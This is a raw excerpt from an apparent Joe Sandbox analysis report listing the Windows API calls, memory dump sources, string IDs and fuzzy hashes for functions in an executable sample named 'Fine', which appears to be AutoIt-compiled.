                                                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002317C6
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002317E2
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 002317F9
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00231801
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00231808
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00231829
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00231830
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023185F
                                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00231881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00231893
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318BA
• HeapFree.KERNEL32(00000000), ref: 002318C1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318CA
• HeapFree.KERNEL32(00000000), ref: 002318D1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318DA
• HeapFree.KERNEL32(00000000), ref: 002318E1
• GetProcessHeap.KERNEL32(00000000,?), ref: 002318ED
• HeapFree.KERNEL32(00000000), ref: 002318F4
  • Part of subcall function 00231ADF: GetProcessHeap.KERNEL32(00000008,002314FD,?,00000000,?,002314FD,?), ref: 00231AED
  • Part of subcall function 00231ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002314FD,?), ref: 00231AF4
  • Part of subcall function 00231ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002314FD,?), ref: 00231B03
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 0d9453e05d8c498449e2a94625808a669025a330bde00694fddbc54c00796d08
• Instruction ID: eadffe99fb43bb2430e0c679090b238654ef4332c534844f6bd7d87abf730d63
• Opcode Fuzzy Hash: 0d9453e05d8c498449e2a94625808a669025a330bde00694fddbc54c00796d08
• Instruction Fuzzy Hash: E0715EB1E1020AAFEF10DFA5EC49FAEBBB8BF04310F148155F915A6190D7719925CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0026DCD0,00000000,?,00000000,?,?), ref: 0025CFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0025D004
• _wcslen.LIBCMT ref: 0025D054
• _wcslen.LIBCMT ref: 0025D0CF
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0025D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0025D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0025D2AD
• RegCloseKey.ADVAPI32(?), ref: 0025D2E1
• RegCloseKey.ADVAPI32(00000000), ref: 0025D2EE
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0025D3C0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 90af9a880ede7b0beb8db02bf8e3282602d4c4a18bca193813af06bfcb1b26cc
• Instruction ID: bca46e928ed12f8b42d2ed8b490f393a1bd761a153736a83fbd6274f6826c48c
• Opcode Fuzzy Hash: 90af9a880ede7b0beb8db02bf8e3282602d4c4a18bca193813af06bfcb1b26cc
• Instruction Fuzzy Hash: F11269356142019FDB24DF14C881B2AB7E5FF88714F14889EF98A9B3A2DB31ED45CB85
APIs
• CharUpperBuffW.USER32(?,?), ref: 00261462
• _wcslen.LIBCMT ref: 0026149D
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002614F0
• _wcslen.LIBCMT ref: 00261526
• _wcslen.LIBCMT ref: 002615A2
• _wcslen.LIBCMT ref: 0026161D
  • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
  • Part of subcall function 00233535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00233547
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 4b2664bfddaa89ae2e9bb7677a35d92918e2ce59da4c31187a96e3a190ef6d4f
• Instruction ID: 906de4b6147d3e3111b535922fc18d9f9ada56384b880d4b2cd94c0754ff2b32
• Opcode Fuzzy Hash: 4b2664bfddaa89ae2e9bb7677a35d92918e2ce59da4c31187a96e3a190ef6d4f
• Instruction Fuzzy Hash: 2EE1B0356283428FCB14DF25C45182AB7E2BFA4314F58895DF8969B3A1DB30FDA5CB81
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DB5
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DC9
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DEC
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268E0F
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00268E4D
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00266691), ref: 00268EA9
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00268EE2
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00268F25
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00268F5C
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00268F68
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00268F78
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00266691), ref: 00268F87
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00268FA4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00268FB0
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0024493D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244948
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024499F
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002449DD
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00244A1B
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244A63
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244A9E
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244ACC
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00236395
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002363A7
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 002363BE
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002363D3
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002363D9
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002363E9
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002363EF
                                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00236410
                                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0023642A
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00236433
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023649A
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 002364D6
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 002364DC
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 002364E3
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0023653A
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00236547
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0023656C
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00236596
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1ebc38b09df26a25b98554318e8eb945b8a8938ffb13bf5c00a821b01cedc816
                                                                                                                                                                                                                                                                                                                            • Instruction ID: da6129360faaf8455ba008285c20ed2b90a7a5267aee86ecd7b5965296e53f7a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ebc38b09df26a25b98554318e8eb945b8a8938ffb13bf5c00a821b01cedc816
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3719371E0070AAFDB20DFA8DD49B6EBBF9FF48704F108518E586A25A0D7B1E954CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00250884
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0025088F
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0025089A
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 002508A5
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 002508B0
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 002508BB
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 002508C6
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 002508D1
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 002508DC
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 002508E7
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 002508F2
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 002508FD
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00250908
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00250913
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0025091E
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00250929
                                                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00250939
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025097B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c18a8e1f57658afb455988f3874a85e1c60a73c14e2406c60d4b50fddffcd111
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7462548ef57b040a41aff2b43b82e520f314ef38bae4f9a91d764f1a32be6d20
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c18a8e1f57658afb455988f3874a85e1c60a73c14e2406c60d4b50fddffcd111
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC4134B0D0831A6ADB109FB68CC985EBFE8BF04754B50452AE518E7291D774D901CF95
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k)
                                                                                                                                                                                                                                                                                                                            • API String ID: 176396367-2110454241
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1705f7ea47ca8fa29199835c1be0399567ab7ae943f37678c2062d22c35e5c09
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 01ca0a4857cdce910ce95971f743c8e6799c139d6c2eec33254b8009dec9a2d1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1705f7ea47ca8fa29199835c1be0399567ab7ae943f37678c2062d22c35e5c09
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E1D3B2A20516ABCF14DFB8C8516EEFBB5BF14714F10412AE456F7250EB30AF658790
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00269BA3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: ClientToScreen.USER32(?,?), ref: 002680D4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: GetWindowRect.USER32(?,?), ref: 0026814A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: PtInRect.USER32(?,?,?), ref: 0026815A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00269C0C
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00269C17
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00269C3A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00269C81
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00269C9A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00269CB1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00269CD3
                                                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00269CDA
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00269DCD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 221274066-593282862
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001F0436
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: InitializeCriticalSectionAndSpinCount.KERNEL32(002A170C,00000FA0,D7E9E051,?,?,?,?,00212733,000000FF), ref: 001F048C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00212733,000000FF), ref: 001F0497
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00212733,000000FF), ref: 001F04A8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001F04BE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001F04CC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001F04DA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001F0505
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001F0510
                                                                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 001F0457
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0413: __onexit.LIBCMT ref: 001F0419
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 001F04B8
                                                                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 001F04C4
                                                                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001F0492
                                                                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 001F04A3
                                                                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 001F04D2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,0026DCD0), ref: 00244F6C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244F80
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244FDE
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00245039
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00245084
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002450EC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00297C10,00000061), ref: 00245188
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
